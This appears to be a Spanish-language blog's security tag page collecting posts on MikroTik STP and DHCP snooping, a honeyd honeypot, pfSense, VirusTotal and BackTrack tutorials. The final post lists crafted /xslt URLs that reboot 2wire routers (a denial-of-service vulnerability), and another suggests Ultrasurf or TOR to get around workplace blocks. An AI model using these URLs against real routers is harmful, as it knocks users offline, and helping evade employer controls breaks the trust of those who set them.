Mostrando las entradas con la etiqueta Seguridad. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Seguridad. Mostrar todas las entradas

jueves, 12 de diciembre de 2024

Evitar bloqueos por bucles (loops) en la red con STP en mikrotik.

Querernos tener una protección contra los bucles (loops) en la red de manera general.

La forma adecuada es tener habilitado el STP (Spanning Tree Protocol) en mikrotik. Por norma, está habilitado con RSTP. Pero, suponiendo que el equipo no tiene configuración alguna  sería de la siguiente  manera. 

Escenario: 

El equipo mikrotik tiene la función de router que da servicio  un switch plano (no administrable).

Configuración: 

Crear el bridge
Doble clic sobre el bridge para acceder a las opciones de configuración
Acceder a la pestaña STP
En la sección de modo de protocolo seleccionar RSTP



Con la configuración que está incluida por norma en el equipo mikrotik, es suficiente para evitar los loops, sin embargo siempre hay que estar al pendiente de los logs del equipo.

miércoles, 11 de diciembre de 2024

Detener a un dhcp intruso en la red con Mikrotik - dhcp snooping - Rogue Dhcp

 Queremos protegernos ante un servidor dhcp no autorizado en la red (Rogue Dhcp), y tenemos un router Mikrotik. 

    Escenario:

El equipo mikrotik es el router principal de la red.
El equipo mikrotik le da servicio a un switch plano (no administrable).
El equipo mikrotik está configurado propagando un segmento 192.168.200.1/24 dentro del bridge1 (lan).

    Configuración:

Hay que habilitar la opción "DHCP Snooping" en el bridge.
 - Si está usando la opción 82 en un servidor dhcp, hay que habilitarla.



miércoles, 14 de agosto de 2013

Instalar el Honeypot honeyd 1.5c-7 en Debian Jessie

Se me ocurrió instalar el honeypot  honeyd en debian jessie para la red de mi hogar (existen 19 dispositivos conectados a Internet) con la finalidad de saber si alguien anda tratando de hacer algo extraño en la red.

El primer problema que me encontré es que no estaba el paquete desde el apt, y tenía mucha flojera de andar compilando de las fuentes. Así que, mejor busque en los repositorios de debian el paquete que requería.

En la versión de squeeze esta el paquete honeyd 1.5c-7, por lo tanto es cuestión de descargar el .deb de la arquitectura que tengamos.

domingo, 18 de marzo de 2012

Entrar a Facebook o Twitter aunque este bloqueado en la empresa.



Una persona me pregunto lo siguiente:

¿Como puedo entrar a Facebook y Twitter, si en la empresa lo tienen bloqueado?. Existen varias formas que se pueden intentar para poder entrar a las páginas que se encuentran restringidas por algún servidor proxy de la empresa.


A continuación mencionare solo algunas de las formas posibles ( las mas sencillas )

Ultrasurf: En el blog ya habíamos hablado de el. Visita la nota





TOR: En el blog ya habíamos hablado de el. Visita la nota.






sábado, 17 de marzo de 2012

Instalación y configuración de Pfsense enfocado a WISP



"pfSense es una distribución personalizada de FreeBSD adaptado para su uso como Firewall y Router. Se caracteriza por ser de código abierto, puede ser instalado en una gran variedad de ordenadores, y además cuenta con una interfaz web sencilla para su configuración." Wikipedia.


Pfsense es un equivalente a Ipcop, Brazill fw , Monowall , Zeroshell











La manera rápida para asegurarnos que un archivo no sea un virus



Analice el siguiente panorama:

Le envían una archivo del cual tiene dudas si  está infectado por algún bicho extraño, le pasa el antivirus ( por que tiene antivirus, ¿verdad? ) y aún tiene dudas del archivo.

La solución para saber si el archivo tiene algún tipo de infección la puede encontrar en www.virustotal.com, en dicha página podrá subir un archivo y será escaneado por varios "antivirus online" de manera automática.












Aprende Backtrack 5 con Videotutoriales (screencast)



El usuario  @hlixaya   (  Héctor López ), se encuentra desarrollando una serie de vídeos en los cuales explica como pueden usar algunas de las herramientas con las que cuenta el backtrack 5.


Enlace para ver los vídeos:   http://vimeo.com/cursobacktrack5/videos  

jueves, 24 de septiembre de 2009

Las Vulnerabilidades del 2wire por ataque vía DOS

Existen varias vulnerabilidades en los routers 2wire unas muy simples otras muy preocupantes, en este caso recordaremos una que aun sigue vigente.

Se trata de la vulnerabilidad de ataque DOS, ya que se puede reiniciar con hacer una peticion a /xslt con el valor %X donde X es cualquier caracter que no es de la A-z.

Ejemplo:

http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%%21!
http://gateway.2wire.net/xslt?page=%++
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%%27
http://gateway.2wire.net/xslt?page=%%7E
http://gateway.2wire.net/xslt?page=%**
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?

Entonces al entrar alguno de estos enlaces el router se reiniciará.

Fuente: milw0rm.com